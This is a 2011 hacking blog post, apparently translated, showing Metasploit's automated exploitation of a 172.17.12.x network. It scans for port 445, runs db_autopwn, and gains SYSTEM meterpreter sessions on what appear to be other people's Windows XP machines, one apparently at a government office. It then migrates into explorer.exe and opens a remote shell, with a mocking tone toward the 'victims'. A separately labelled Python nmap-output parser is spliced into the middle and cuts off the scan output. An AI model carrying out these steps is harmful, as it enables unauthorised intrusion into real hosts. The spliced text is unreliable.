14 October 2011

Automated Exploitation with Metaspl0it

Anyone who's into hacking is surely already familiar with this one: yup, Metaspl0it.
Now I want to share automated exploitation with Metasploit, so Metaspl0it goes looking for targets and their exploits by itself. Nice, right? Right?
Follow the steps below:

Install PostgreSQL first, because here we'll be using the postgresql db_driver in Metaspl0it.

ichamedusa@359imbox:~$ sudo apt-get install postgresql
ichamedusa@359imbox:~$ sudo apt-get install libpgsql-ruby


Once PostgreSQL is installed, first create a user and a database to connect to Metaspl0it.

ichamedusa@359imbox:~$ sudo su postgres


createuser namauser -P (-P sets a password for the user)

ichamedusa@359imbox:/home/ichamedusa$ createuser ichamedusa -P
Enter password for new role: [enter the user's password]
Enter it again: [enter the user's password once more]
Shall the new role be a superuser? (y/n) Y


The user's done, now set up the database for the pentest:
createdb --owner=user nama_database

Start PostgreSQL..

postgres@359imbox:/home/ichamedusa$ /etc/init.d/postgresql-8.4 start


OK, all the preparation is done, now it's just a matter of telling Metaspl0it to go find a victim. hahaha

postgres@359imbox:/home/ichamedusa$ sudo msfconsole


Use the PostgreSQL driver, then connect to the database you created earlier.

msf > db_driver postgresql


// db_connect user:password@localhost/nama_database


msf > db_connect scr3am:150787@127.0.0.1/msf_auto_pwn


Now just set the IP range we're going to exploit; I looked for targets with port 445 (just to narrow down the search).
How you scan can vary depending on your creativity and your needs.

msf > db_nmap -p 445 172.17.12.0-100
[*] Nmap: Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-07 13:20 WIT
[*] Nmap: Nmap scan report for 172.17.12.13
[*] Nmap: Host is up (0.012s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.16
[*] Nmap: Host is up (0.014s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.18
[*] Nmap: Host is up (0.016s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.39
[*] Nmap: Host is up (0.023s latency).
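Added example, not from the original post: a small Python parser for the db_nmap console lines in the format shown above. It builds a per-host inventory so you can see which hosts the scan actually recorded with 445/tcp open, versus hosts that only replied (or reported the port filtered), which is the list a defender would use to prioritize firewalling or patching. The sample lines are constructed to mirror the page's output.

```python
import re

# Constructed sample in the db_nmap console format shown on the page.
# The last host has no port line (as in the truncated output above) and
# one host reports the port as filtered rather than open.
SAMPLE = """\
[*] Nmap: Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-07 13:20 WIT
[*] Nmap: Nmap scan report for 172.17.12.13
[*] Nmap: Host is up (0.012s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.16
[*] Nmap: Host is up (0.014s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp filtered microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.39
[*] Nmap: Host is up (0.023s latency).
"""

REPORT_RE = re.compile(r"^\[\*\] Nmap: Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^\[\*\] Nmap: (\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_db_nmap(text):
    """Return {host: [(port, proto, state, service), ...]} from db_nmap lines.

    A host is recorded as soon as its 'scan report' line appears, so hosts
    with no port lines still show up (with an empty list).
    """
    hosts = {}
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append((int(port), proto, state, service))
    return hosts


def hosts_with_open_port(hosts, port, proto="tcp"):
    """Hosts whose inventory shows the given port in state 'open' (sorted)."""
    return sorted(h for h, ports in hosts.items()
                  if any(p == port and pr == proto and st == "open"
                         for p, pr, st, _ in ports))
```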


Let it run.

msf > db_autopwn -e -q -p
[*] (175/175 [2 sessions]): Waiting on 5 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 5 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 4 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 3 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 1 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 1 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 0 launched modules to finish execution...


OK, all done.

msf > sleep 5
msf > jobs -K
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ KOMINFO-DFE1227 172.17.42.2:41031 -> 172.17.12.146:4793
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ RINA_PUNYA 172.17.42.1:55416 -> 172.17.12.70:10811

msf > sessions -i 1
[*] Starting interaction with 1...


Got two, folks..

meterpreter > sysinfo
System Language : en_US
OS : Windows XP (Build 2600, Service Pack 2).
Computer : KOMINFO-DFE1227
Architecture : x86
Meterpreter : x86/win32


Wow, turns out it's Windows XP SP2, folks. Let's take a look at its tasks..

meterpreter > ps
PID Name Arch Session User Path
1112 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1324 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\AVAST Software\Avast\AvastSvc.exe
1360 explorer.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\Explorer.EXE
1464 AvastUI.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\AVAST Software\Avast\avastUI.exe
1476 igfxtray.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxtray.exe
1484 hkcmd.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\hkcmd.exe
1492 igfxpers.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxpers.exe
1504 BJMYPRT.EXE x86 0 KOMINFO-DFE1227\lina C:\Program Files\Canon\MyPrinter\BJMyPrt.exe
1548 igfxsrvc.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxsrvc.exe
1604 devices.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\Innovative Solutions\DriverMax\devices.exe
164 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
2200 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2600 firefox.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\Mozilla Firefox\firefox.exe
3156 wscntfy.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\wscntfy.exe
3172 wuauclt.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\wuauclt.exe
3204 EXCEL.EXE x86 0 KOMINFO-DFE1227\lina C:\Program Files\Microsoft Office\Office12\EXCEL.EXE


Time to move into explorer.exe by migrating to its PID.

meterpreter > migrate 1360
[*] Migrating to 1360...
[*] Migration completed successfully.

meterpreter > shell
Process 1932 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\lina>


Once you've gotten this far, what else do you want to do, huh?
